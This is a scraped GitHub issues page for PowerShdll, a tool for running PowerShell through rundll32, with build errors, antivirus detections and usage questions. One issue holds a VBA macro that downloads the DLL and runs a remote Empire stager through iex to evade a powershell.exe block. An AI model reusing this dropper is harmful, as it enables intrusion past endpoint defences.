
powershdll's People

Contributors

p3nt4

powershdll's Issues

missing entry "main"

After compilation I was trying to start rundll32.exe powerhsell.dll,main -w but got missing entry "main"
How to fix it? Nothing changed in source code

-enc equivalent?

Is it possible to pass base64 encoded powershell commands?
Similar to powershell -ep bypass -nop -enc XXXXXX

About deduced target to 2.0 and 3.5

I have a question about deduced target to 2.0 and 3.5.
Reference System.Management.Automation.dll in your code, but this is the net framework 4.5.
For the 4.5 framework, the code works perfectly, but there are dependencies problem for the 3.5 framework.
Is there any way to solve it? For example, a System.Management.Automation.dll v2.0. I do not understand how you solved it in your code.
Thank you for your help.

Here is my modified test code:

using System;
using System.Text;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace pws
{
    public class pwd
    {
        // Exported with the entry-point signature that rundll32 calls.
        [DllExport("main", CallingConvention = CallingConvention.Cdecl)]
        public static void main(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
        {
            Runspace runspace;
            runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();
            string cmd = @"start-process e:\test.exe";
            try
            {
                Pipeline pipeline = runspace.CreatePipeline();
                pipeline.Commands.AddScript(cmd);
                pipeline.Commands.Add("Out-String");
                // Invoke() returns a Collection<PSObject>.
                Collection<PSObject> results = pipeline.Invoke();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject obj in results)
                {
                    stringBuilder.AppendLine(obj.ToString());
                }
            }
            catch (Exception e)
            {
                string errorText = e.Message + "\n";
            }
            runspace.Close();
            return;
        }
    }
}

DotNet 2.0 support?

I can't compile PowerShdll with .net framework 2.0 version, is it possible to add support for that?

On Windows 2008, .net framework 3.5 is not installed by default.

Run one liner command

Hi,

Is it possible to pass some arguments such that it can execute, for instance, an encoded payload? Something like:

rundll32.exe PowerShDll,main -enc <encoded_payload>

Thx.

dll deleted by antivirus

Tried to run this command: regsvcs.exe C:\Users\xxxx\Desktop\PowerShdll-master\dll\bin\x86\Release\PowerShdll.dll. The dll was deleted by antivirus.

about windows 7 32bit

When I executed this code on Windows 7 32-bit, there is a problem:

Stopped working:
problem name: APPCRASH
Application Name: rundll32.exe
Application Version: 6.1.7600.16385
Application Timestamp: 4a5bc637
Fault Module Name: KERNELBASE.dll
Fault Module Version: 6.1.7601.17514
Fault Module Timestamp: 4ce7b8f0
Exception Code: e0434f4d
Exception Offset: 0000b760
OS : 6.1.7601.2.1.0.256.48
area ID: 2052

Malware

Figured I would let you all know that this code is being flagged as malware. The DLL file that is.

initialization

I am getting an error "A dynamic Link Library (DLL) initialization routine failed" any ideas on how to fix this? Thanks.

Missing Entry: Main

Trying to figure out why I can't seem to have a working build. VS community 2019.

image
image

As you can see from the pic, it successfully builds. I even delete the dlls and rebuild and build works fine.

But then it says Missing entry: main.

There will be problems with execution on windows7

Hello, friend!
This is a very useful project.
I had a problem with executing code on Windows 7, “Run32dll stops working”. But it's okay to execute code on Windows 10.
Does this project not support the Windows7 operating system?

Execute PowerShdll from VBA macro

First of all: thanks for this awesome project!

I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()) and then executing the downloaded PowerShdll.dll by letting it download a script to execute (Empire stager). This works when I execute StrCmd in a cmd.exe, but does not work when executing it via the following VBA script:

Public Function Debugging() As Variant
    DownloadDLL
    Dim StrCmd As String
    StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function

Sub DownloadDLL()

    Dim myURL As String
    myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
        oStream.Close
    End If

End Sub

This results in the following error message:

Problem signature:
  Problem Event Name:	CLR20r3
  Problem Signature 01:	rundll32.exe
  Problem Signature 02:	6.3.9600.17415
  Problem Signature 03:	54504eb8
  Problem Signature 04:	mscorlib
  Problem Signature 05:	4.0.30319.36366
  Problem Signature 06:	57a0f7f9
  Problem Signature 07:	4528
  Problem Signature 08:	9a
  Problem Signature 09:	System.IO.IOException
  OS Version:	6.3.9600.2.0.0.272.7
  Locale ID:	1033
  Additional Information 1:	6ebd
  Additional Information 2:	6ebd833e076778d4646eaf22a3f76243
  Additional Information 3:	e34d
  Additional Information 4:	e34d4e50642e55705797b1cdfa61a4c5

Any clue as to how I can fix this? Thanks in advance!
